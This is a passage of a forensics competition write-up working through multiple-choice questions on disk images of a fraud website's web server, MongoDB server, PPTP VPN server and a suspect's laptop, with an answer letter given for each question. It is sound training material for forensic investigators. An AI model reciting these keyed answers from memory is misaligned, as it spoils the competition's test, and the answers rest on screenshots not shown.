(<strong>D</strong>) </p><p><code>A.192.168.160.131 B.192.168.184.131 C.192.168.160.169 D.192.168.184.129</code></p></li><li><p>What is the database username? (<strong>A</strong>)</p><p><code> A. root B. tougu C. admin D. goose</code></p></li><li><p>What is the database password? (<strong>D</strong>)</p><p><code> A.123456 B. admin C. goose D. root</code></p></li><li><p>What is the name of the database the website uses? (<strong>B</strong>)</p><p><code>A. root B. tougu C. admin D. goose</code></p></li></ol></blockquote><p>Look at <code>db.js</code>:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021202137166.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021202137166.png" srcset="" alt="image-20201021202137166"></p><blockquote><ol start="34"><li><p>At the time of the incident, the attacker encrypted a file/directory on this server; which one? (<strong>A</strong>)</p><p><code>A. ~/.bash_history B. /var/log/ C. /etc/ssh/sshd_config D. ~/runit-agent.txt</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021203854420.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021203854420.png" srcset="" alt="image-20201021203854420"></p><h2 id="Part-2"><a href="#Part-2" class="headerlink" title="Part 2"></a>Part 2</h2><p>You have obtained the hard-disk image file “检材 2.E01” (evidence item 2) of the P2P investment website's database server. Based on this image, answer the following questions:</p><blockquote><ol start="35"><li><p>Where is the database installed on this database server? (<strong>D</strong>)</p><p><code>A. /etc/mysql/ B. /home/redis/ C. /etc/mongo/ D. /var/lib/mongo/</code></p></li><li><p>What is the path of the database configuration file? (<strong>C</strong>)</p><p><code>A. /var/lib/mongo/mongo.conf B. /var/lib/mongo/mongod.conf C. /etc/mongod.conf D. /home/redis/redis.conf</code></p></li><li><p>Where is the database log file? (<strong>C</strong>)</p><p><code>A. /etc/redis.log B. /var/log/mongodb.log C. /var/log/mongodb/mongod.log D. /var/li/mongo/mongo.log</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021211840499.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021211840499.png" srcset="" alt="image-20201021211840499"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021212314873.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021212314873.png" srcset="" alt="image-20201021212314873"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021213822422.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021213822422.png" srcset="" alt="image-20201021213822422"></p><p>While we are here, look at the configuration file:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021214039425.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021214039425.png" srcset="" alt="image-20201021214039425"></p><blockquote><ol start="38"><li><p>What is the name of the website's user table in this database? (<strong>B</strong>)</p><p><code>A. user B. users C. touzi D. licai</code></p></li><li><p>How is the password field of the website's user table encrypted? (<strong>A</strong>)</p><p><code>A. Unencrypted B. Double MD5 C. MD5 with salt D. MD5</code></p></li><li><p>What modification was made to the user table? (<strong>B</strong>)</p><p>A. User deleted B. User password changed C. Username changed D. User added</p></li><li><p>Which database did the suspect perform a risky operation on? (<strong>C</strong>)</p><p><code>A. licai B. touzi C. tougu D. admin</code></p></li><li><p>What risky operation did the suspect perform on that database? (<strong>D</strong>)</p><p>A. Renamed the database B. Added a database C. Queried the database D. Dropped the database</p></li></ol></blockquote><p>Because reading the user's registration information happens on the front end, we go back to the front end (evidence item 1) and look at the code:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201112114926679.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201112114926679.png" srcset="" alt="image-20201112114926679"></p><p>The logic is clear: there is no decryption of <code>data[0].password</code> and no encryption of <code>password</code>, so the answer should be “unencrypted”.</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201022185510697.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201022185510697.png" srcset="" alt="image-20201022185510697"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201022192019619.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201022192019619.png" srcset="" alt="image-20201022192019619"></p><blockquote><ol start="43"><li><p>During which time window did the suspect log in to the database? (<strong>D</strong>)</p><p><code>A.18:03-18:48 B.18:05-18:45 C.18:01-18:50 D.18:05-18:32</code></p></li><li><p>At what time did the suspect carry out the risky operation from question 42 on the database? (<strong>A</strong>)<br><code>A.18:09:37 B.18:09:40 C.18:09:44 D.18:09:50</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201022195747946.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201022195747946.png" srcset="" alt="image-20201022195747946"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201022201348763.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201022201348763.png" srcset="" alt="image-20201022201348763"></p><h2 id="Part-3"><a href="#Part-3" class="headerlink" title="Part 3"></a>Part 3</h2><p>Following the investigation, you seized a VPN server the suspect had used and imaged its hard disk as “检材 3.E01” (evidence item 3). Based on that image, answer the following questions:</p><blockquote><ol start="45"><li><p>What protocol does the VPN software on this server use? (<strong>B</strong>)<br><code>A.L2TP B.PPTP C.IPSec D.NFS</code></p></li><li><p>The server's time zone is (<strong>D</strong>)<br><code> A. Asia/ShangHai B. Asia/Tokyo C. Asia/Bangkok D. Asia/Dhaka</code></p></li><li><p>Where is the option file that configures the VPN software on this server? (<strong>A</strong>)<br><code> A. /etc/ppp/options.pptpd B./var/lib/vpn/options.pptpd C./etc/ipsec/options.ipsecd D./etc/l2tp/options.l2tpd</code></p></li><li><p>The <code>VPN</code> software is configured to record client connections and disconnections; which file does it write them to? (<strong>A</strong>)</p><p><code>A.wtmp B.btmp C.ftmp D.tmp</code></p></li><li><p>The IP range assigned to <code>VPN</code> clients is (<strong>B</strong>)</p><p><code>A.192.168.184.1-192.168.184.11 B.192.168.184.12-192.168.184.18</code></p><p><code>C.192.168.184.19-192.168.184.26 D.192.168.184.27-192.168.184.35</code></p></li><li><p>From the <code>option</code> file we can tell that the log path it configures for the <code>VPN</code> software is (<strong>D</strong>)<br><code> A./var/lib/logs/ B./etc/logs/ C./var/log/pptp/ D./var/log/</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201022215759201.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201022215759201.png" srcset="" alt="image-20201022215759201"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201022215925090.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201022215925090.png" srcset="" alt="image-20201022215925090"></p><p>Then open the configuration file: <img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201024141837714.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201024141837714.png" srcset="" alt="image-20201024141837714"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201024142000609.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201024142000609.png" srcset="" alt="image-20201024142000609"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201024142406156.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201024142406156.png" srcset="" alt="image-20201024142406156"></p><p>And also have a look at the <code>options</code> file:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201024143552264.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201024143552264.png" srcset="" alt="image-20201024143552264"></p><blockquote><ol start="51"><li>The <code>VPN</code> software records the names and passwords used by clients; the file they are recorded in is (<strong>C</strong>)</li></ol><p><code>A. /etc/l2tp/chap-secrets B. /etc/ipsec/pap-secrets C. /etc/ppp/chap-secrets D. /etc/ppp/pap-secrets</code></p></blockquote><p>Look in the directories from the four options~</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201024143827699.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201024143827699.png" srcset="" alt="image-20201024143827699"></p><blockquote><ol start="52"><li><p>Which username logged in to the <code>VPN</code> client at server time <code>2019-07-02_02:08:27</code>? (<strong>C</strong>)</p><p><code>A. root B. vpn1 C. vpn2 D. 
vpn3</code></p></li><li><p>上题用户登陆时的客户<code>IP</code>是什么?(<strong>A</strong>)</p><p><code>A. 192.168.184.133 B. 172.16.81.101 C. 192.168.184.134 D. 192.168.43.238</code></p></li><li><p>通过 <code>IP172.16.80.188 </code>登陆<code>VPN</code>服务器的用户名是哪个?(<strong>A</strong>)</p><p><code>A. root B. vpn1 C. vpn2 D. vpn3</code></p></li><li><p>上题用户登陆 <code>VPN </code>服务器的北京时间是(<strong>D</strong>)</p><p><code>A. 2019-07-11_10:46:50 B. 2019-07-11_11:30:36 C. 2019-07-13_14:15:37 D. 2019-07-13_16:15:37</code></p></li></ol></blockquote><p>查看日志文件: <img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025105736683.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025105736683.png" srcset="" alt="image-20201025105736683"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025110410326.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025110410326.png" srcset="" alt="image-20201025110410326"></p><p>前几题得知,服务器时间是<code>Asia/Dhaka</code>,比北京时间早<code>2h</code>,所以北京时间应该是<code>2019-07-13_16:15:37</code></p><blockquote><ol start="56"><li><p>该服务器曾被进行过抓包,请问 <code>network.cap </code>是对哪个网卡进行抓包获得的抓包文件?(<strong>B</strong>)</p><p><code>A.eth0 B.ens33 C.ens37 D.ens160</code></p></li><li><p>对 <code>ens37</code> 网卡进行抓包产生的抓包文件并保存下来的是哪个?(<strong>D</strong>)</p><p><code>A. network.cap B. network1.cap C. net0713.cap D. 
net0713-1.cap</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201024163241247.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201024163241247.png" srcset="" alt="image-20201024163241247"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201024164502919.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201024164502919.png" srcset="" alt="image-20201024164502919"></p><blockquote><ol start="58"><li><p>从保存的数据包中分析可知,出口的 <code>IP</code> 为(<strong>A</strong>)</p><p><code>A. 172.16.80.92 B. 172.16.81.101 C. 172.16.81.188 D. 172.16.80.133</code></p></li></ol></blockquote><p>我们用<code>wireshark</code>打开<code>net0713.cap</code>文件跟踪<code>tcp</code>流,但是找不到<code>ABCD</code>任何一个选项……我们再打开<code>net0713-1.cap</code>数据包,找到答案:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025111547524.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025111547524.png" srcset="" alt="image-20201025111547524"></p><p>但是为什么第一个数据包里面就没有答案呢???这是因为该<code>vpn</code>服务器为双网卡,对内IP为<code>192.168.184.133</code>,具备对检材1(<code>192.168.184.128</code>)和检材2(<code>192.168.184.129</code>)访问权限,出口/服务端IP为<code>172.16.80.92</code>。</p><h2 id="Part-4"><a href="#Part-4" class="headerlink" title="Part 4"></a>Part 4</h2><p>你抓获了嫌疑人,并扣押了嫌疑人笔记本电脑,制作笔记本硬盘镜像文件“检材 4.E01”,请根据镜像文件,回答下列问题:</p><blockquote><ol start="59"><li><p>计算“检材 4.E01”文件的 sha256 值(<strong>C</strong>)</p><p><code>A. 
58a4ab5ee3dc4c4a279fa8287ed7dce315090512fa87127f8f9278c7972366c5</code></p><p><code>B. 58a4ab5ee3dc4c4a279fa8287ed7dce315090512fa87127f8f9278c7972366c6</code></p><p><code>C. e6e47e210bd56c7071ce73ab5523736120071d0f3da5335936d7beb25c3914cd</code></p><p><code>D. 1e646dec202c96b72f13cc3cf224148fc4e19d6faaaf76efffc31b1ca2cdd200</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025113252486.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025113252486.png" srcset="" alt="image-20201025113252486"></p><blockquote><ol start="60"><li><p>请分析该检材的操作系统版本(<strong>A</strong>)</p><p><code>A. Windows 10 Education B. Windows 10 Home C. Windows 10 Pro D. Windows 10 Enterprise</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025113321982.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025113321982.png" srcset="" alt="image-20201025113321982"></p><blockquote><ol start="61"><li><p>找出该系统用户最后一次登陆时间:(<strong>C</strong>)</p><p><code>A. 2019-07-14 10:50:02 B. 2019-07-14 10:10:02 C. 2019-07-14 10:40:02 D. 2019-07-14 10:30:02</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025113143282.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025113143282.png" srcset="" alt="image-20201025113143282"></p><blockquote><ol start="62"><li><p>找出该系统最后一次正常关机时间:(<strong>C</strong>)</p><p><code>A. 
2019-07-14 17:30:05 B. 2019-07-14 10:30:05 C. 2019-07-14 11:30:05 D. 2019-07-14 12:30:05</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025114751529.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025114751529.png" srcset="" alt="image-20201025114751529"></p><blockquote><ol start="63"><li><p>请计算检材桌面上文本文件的 sha256 值:(<strong>A</strong>)</p><p><code>A. 58a4ab5ee3dc4c4a279fa8287ed7dce315090512fa87127f8f9278c7972366c5</code></p><p><code>B. 58a4ab5ee3dc4c4a279fa8287ed7dce315090512fa87127f8f9278c7972366c6</code></p><p><code>C. 58a4ab5ee3dc4c4a279fa8287ed7dce315090512fa87127f8f9278c7972366c7</code></p><p><code>D. 58a4ab5ee3dc4c4a279fa8287ed7dce315090512fa87127f8f9278c7972366c8</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025114916816.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025114916816.png" srcset="" alt="image-20201025114916816"></p><blockquote><ol start="64"><li><p>该系统于 2019 年 7 月 13 日安装的软件为:(<strong>A</strong>)</p><p><code>A. Eraser B. Putty C. Xftp D. 
Xshell</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025115104789.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025115104789.png" srcset="" alt="image-20201025115104789"></p><blockquote><ol start="65"><li><p>找出该嫌疑人于 2019-07-13 17:52:19 时,使用 WinRAR 工具访问了_____文件:(<strong>D</strong>)</p><p><code> A.navicat11.zip B. we.tar.gz C. test2-master.zip D. BitLocker.rar</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201112091057054.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201112091057054.png" srcset="" alt="image-20201112091057054"></p><blockquote><ol start="66"><li><p>系统于 <code>2019-07-13 17:53:45 </code>时运行了___程序:(<strong>D</strong>)</p><p><code>A. regedit.exe B. WinRAR.exe C. Xshell.exe D. Foxmail.exe</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025115848963.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025115848963.png" srcset="" alt="image-20201025115848963"></p><blockquote><ol start="67"><li><p>文件<code>test2-master.zip</code>是什么时间下载到本机的:(<strong>D</strong>)</p><p><code>A. 2019-07-13 14:21:01 B. 2019-07-13 17:22:01 C. 2019-07-13 15:23:01 D. 
2019-07-13 16:20:01</code></p></li></ol></blockquote><p>下载文件一般都是默认储存在“下载”文件夹下:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025120131866.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025120131866.png" srcset="" alt="image-20201025120131866"></p><blockquote><ol start="68"><li><p>文件 <code>test2-master.zip</code> 是使用什么工具下载到本地的:(<strong>A</strong>)</p><p><code>A. Chrome B. Internet Explorer C. edge D.迅雷</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025120241300.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201025120241300.png" srcset="" alt="image-20201025120241300"></p><blockquote><ol start="69"><li><p>嫌疑人成功连接至 <code>192.168.184.128 </code>服务器的时间为:(<strong>A</strong>)</p><p><code>A. 2019-07-13 16:21:28 B. 2019-07-13 16:21:31 C. 2019-07-13 16:21:35 D. 2019-07-13 16:21:25</code></p></li></ol></blockquote><p>在取证大师里面查看上网记录:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201106135548896.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201106135548896.png" srcset="" alt="image-20201106135548896"></p><blockquote><ol start="70"><li><p>嫌疑人通过远程连接到 <code>128</code> 服务器,下载了什么文件到本机:(<strong>B</strong>)</p><p><code> A. web.tar.gz B. we.tar.gz C. home.tar.gz D. 
wwwroot.tar.gz</code></p></li><li><p>承接上一题,下载该文件用了多长时间:(<strong>C</strong>)</p><p><code> A.10 秒 B.20 秒 C.15 秒 D.25 秒</code></p></li><li><p>请计算该下载文件的 sha256 值:(<strong>D</strong>)</p><p><code> A. 077d894557edf44e5792e0214e0f1c46b9b615be11ac306bcce2af9d666f47d8</code></p><p><code> B. 077d894557edf44e5792e0214e0f1c46b9b615be11ac306bcce2af9d666f47d7</code></p><p> <code>C. 077d894557edf44e5792e0214e0f1c46b9b615be11ac306bcce2af9d666f47d6</code></p><p> <code>D. 077d894557edf44e5792e0214e0f1c46b9b615be11ac306bcce2af9d666f47d5</code></p></li></ol></blockquote><p>取证大师里面搜索关键字<code>.tar.gz</code>:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201106211846725.png" class="lazyload" 